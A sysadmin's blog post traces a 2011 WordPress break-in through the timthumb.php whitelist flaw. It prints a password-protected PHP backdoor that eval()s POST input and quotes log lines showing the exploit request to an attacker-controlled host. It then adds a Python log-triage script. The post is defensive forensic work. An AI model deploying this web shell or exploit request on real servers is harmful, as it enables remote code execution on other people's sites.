Wordpress timthumb hack - a PHP hack story

Written by - 0 comments

Published on - Listed in Linux PHP Hacks Wordpress

And the cat and mouse game goes on and on...

As I already wrote in another post, 'On a hacker's trail', it's always the same story: the admin (tries to) secure the system as much as possible, hackers (might) come in, the admin finds the hacker and fixes the vulnerability, the hackers (might) find other vulnerabilities.... and so on. At least it keeps me busy ;-).

This time I stumbled over a Wordpress hack that has been known since August 2011 (I found that out after some research). The first hint was an exceptionally large number of POST entries in the access log of one virtual host. So I checked which files had been created through the web server, i.e. files owned by the Apache uid (www-data):

# for file in $(find . -user www-data -name '*.php')
> do
> ls -lh "$file"
> done
-rw-r--r-- 1 www-data www-data 431 2011-08-06 10:41 ./critics/wp-admin/upd.php
-rw-r--r-- 1 www-data www-data 4 2011-08-05 17:45 ./critics/wp-content/themes/InReview/cache/external_9cb702aa084691e66c789c1e98d6233a.php
-rw-r--r-- 1 www-data www-data 431 2011-08-06 10:41 ./critics/wp-content/upd.php
-rw-r--r-- 1 www-data www-data 1.6K 2011-08-21 19:39 ./photo/wp-content/themes/DeepFocus2.7/cache/external_ed59d62e1b1e2167275feed65b374079.php
-rw-r--r-- 1 www-data www-data 887 2011-10-07 20:04 ./photo/wp-content/themes/DeepFocus/cache/a31844cea72ed6c9f90b56b039bbf3f5.php
-rw-r--r-- 1 www-data www-data 15K 2011-07-20 10:59 ./photo/wp-content/w3-total-cache-config.php

There were some more files but I left out session files.

After taking a closer look at some of the files, I came across external_ed59d62e1b1e2167275feed65b374079.php, which had interesting content:

# more ./photo/wp-content/themes/DeepFocus2.7/cache/external_ed59d62e1b1e2167275feed65b374079.php
`%Á©bÒ¼#rºôùÚÒ7£Ê:øA\kömúФGÀï^L                               ý×íV~dìúZÃTj

ç                       ¦âV     ÔÒgãUØÑI
Ñ@YñËÔ¥yA¶P*WëßI2!$Û9¯Å¡c5ÿÕØÇA35ÚD&íôÓP«;<?php                                   ÒVZZÚ]é°iöhFÍ ÖJ)^WÍ] Ó®
if(md5($_POST["key"]) == "f732d47960be7e806861987f98a9574c"){$Um51Å?uä%Ä5V`½
$cmd = $_POST["code"];
eval (stripslashes($cmd));

The file starts with binary garbage, as if it were trying to pass as a non-text file (an image, say). grep still finds the match, but because of the NUL and non-UTF-8 bytes it treats the file as binary and reports only the file name instead of printing the matching line:

# grep -r "eval (stripslashes" *
Binary file photo/wp-content/themes/DeepFocus2.7/cache/external_ed59d62e1b1e2167275feed65b374079.php matches

(grep -a, or --binary-files=text, forces grep to treat the file as text and print the line.) But even more interesting is what comes after the binary part. The PHP code expects a POST parameter 'key'. If the md5 hash of the supplied 'key' matches the hard-coded hash f732d47960be7e806861987f98a9574c, a second POST parameter, 'code', is passed through stripslashes() and handed to eval(), i.e. executed as PHP with the privileges of the web server. In short, it is a password-protected backdoor: whoever knows the password gets arbitrary code execution on the server, while the hash keeps other attackers (and casual testers) out.

OK, so far I knew this file doesn't belong to Wordpress and is dangerous. But how did it get onto the system?

Let's take a look in the Apache logs at what happened on August 21st around 19:39, when the file was created/modified:

 - - [21/Aug/2011:19:38:58 +0200] "GET /photo/wp-content/themes/DeepFocus2.7/thumb.php?src=http://blogger.com.bloggera.net/images.php HTTP/1.1" 404 22638 "" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.6.30 Version/10.62"
 - - [21/Aug/2011:19:38:58 +0200] "GET /photo/wp-content/themes/DeepFocus2.7/timthumb.php?src=http://blogger.com.bloggera.net/images.php HTTP/1.1" 200 10557 "" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.6.30 Version/10.62"

The hacker first tried thumb.php, but that file doesn't exist. The second attempt, against timthumb.php, succeeded (HTTP 200). timthumb.php is a PHP script bundled with many themes to resize images, and it can fetch the source image from a remote URL; the version shipped with this theme is vulnerable. The src parameter, http://blogger.com.bloggera.net/images.php, is the tell: timthumb only allowed remote fetches from a whitelist of image hosts such as blogger.com, but it checked for the whitelisted name as a substring of the URL, so an attacker-controlled hostname that merely contains 'blogger.com' passed the check. The fetched 'image' was the backdoor shown above, which timthumb wrote into its cache directory under a .php name, where it can be called directly.
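The following is an added example (not code from the original post or from timthumb) that triages access-log lines for this pattern and contrasts the weak substring whitelist with a hostname check. The log lines are constructed: the client IPs come from the 203.0.113.0/24 documentation range, while the paths and the src= value copy the two requests quoted above, plus two harmless requests for contrast. The allowed-site list is an illustrative subset, an assumption rather than timthumb's actual configuration.

```python
"""Triage Apache access-log lines for timthumb remote-fetch abuse.

Added example, not part of the original post. SAMPLE_LOG is constructed:
the client IPs come from the 203.0.113.0/24 documentation range, while the
paths and the src= value copy the two requests quoted in the post. The
whitelist is an illustrative subset (an assumption), not timthumb's config.
"""
import re
from urllib.parse import parse_qs, urlsplit

ALLOWED_SITES = ["blogger.com", "img.youtube.com"]  # illustrative subset (assumption)

# Apache combined log format; only the fields we need are captured.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

SAMPLE_LOG = """\
203.0.113.5 - - [21/Aug/2011:19:38:58 +0200] "GET /photo/wp-content/themes/DeepFocus2.7/thumb.php?src=http://blogger.com.bloggera.net/images.php HTTP/1.1" 404 22638 "" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.6.30 Version/10.62"
203.0.113.5 - - [21/Aug/2011:19:38:58 +0200] "GET /photo/wp-content/themes/DeepFocus2.7/timthumb.php?src=http://blogger.com.bloggera.net/images.php HTTP/1.1" 200 10557 "" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.6.30 Version/10.62"
203.0.113.9 - - [21/Aug/2011:20:02:11 +0200] "GET /photo/wp-content/themes/DeepFocus2.7/timthumb.php?src=http://img.youtube.com/vi/abc123/0.jpg&w=120 HTTP/1.1" 200 4010 "" "Mozilla/5.0"
203.0.113.9 - - [21/Aug/2011:20:02:12 +0200] "GET /photo/wp-content/themes/DeepFocus2.7/timthumb.php?src=wp-content/uploads/2011/08/cat.jpg&w=120 HTTP/1.1" 200 3980 "" "Mozilla/5.0"
"""


def allowed_by_substring(src: str, allowed=ALLOWED_SITES) -> bool:
    """The weak check: any URL that *contains* a whitelisted name passes."""
    s = src.lower()
    return any(site in s for site in allowed)


def allowed_by_host(src: str, allowed=ALLOWED_SITES) -> bool:
    """Hardened check: parse the URL and compare the real hostname to the list."""
    parts = urlsplit(src)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    host = parts.hostname.lower()
    return any(host == site or host.endswith("." + site) for site in allowed)


def timthumb_fetches(log_text: str) -> list:
    """Every (tim)thumb.php request whose src= points at a remote URL."""
    rows = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        target = urlsplit(m.group("target"))
        if not re.search(r"(?:tim)?thumb\.php$", target.path):
            continue
        src = parse_qs(target.query).get("src", [None])[0]
        if not src or not src.lower().startswith(("http://", "https://")):
            continue  # local image, no remote fetch involved
        rows.append({
            "ip": m.group("ip"),
            "status": int(m.group("status")),
            "script": target.path.rsplit("/", 1)[-1],
            "src_host": urlsplit(src).hostname,
            "substring_check": allowed_by_substring(src),
            "host_check": allowed_by_host(src),
        })
    return rows


def bypass_attempts(log_text: str) -> list:
    """Requests the substring whitelist accepted but a proper host check rejects."""
    return [r for r in timthumb_fetches(log_text)
            if r["substring_check"] and not r["host_check"]]


if __name__ == "__main__":
    for r in bypass_attempts(SAMPLE_LOG):
        print(r["ip"], r["script"], r["status"], r["src_host"])
```

A status of 200 on such a request is the one to chase: it means the remote file was fetched and, in this version of the script, written into the theme's cache directory. Note that a correct hostname check is still thin protection on its own, because any whitelisted host that lets users publish content would pass it; the real fix is not to store fetched data under an executable name in a web-reachable directory at all.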

So this is the entry point, and this is what needs to be fixed.

This hack was first discovered by Mark Maunder on August 1st 2011, and he explains in a very good article how timthumb.php could be abused (very easily, in fact!).

Another good article can be found on this page.
